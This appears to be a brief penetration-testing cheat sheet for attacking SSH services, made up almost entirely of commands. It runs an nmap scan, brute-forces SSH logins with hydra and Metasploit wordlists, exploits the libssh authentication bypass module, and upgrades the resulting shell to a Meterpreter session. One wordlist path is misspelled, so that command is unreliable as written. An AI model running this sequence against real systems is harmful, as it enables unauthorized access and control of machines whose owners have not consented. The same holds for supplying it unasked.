SSH
Techniques
nmap -sV [TARGET IP]
# Bruteforce
hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/commomn_passwords.txt [TARGET IP] -t 4 ssh
ssh [USER]@[TARGET_IP]Exploitation
nmap -sS -sV -O [TARGET]
search libssh_auth_bypass
use auxiliary/scanner/ssh/libssh_auth_bypass
set SPAWN_PTY true
sessions
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter
show options
set SESSION
exploitLast updated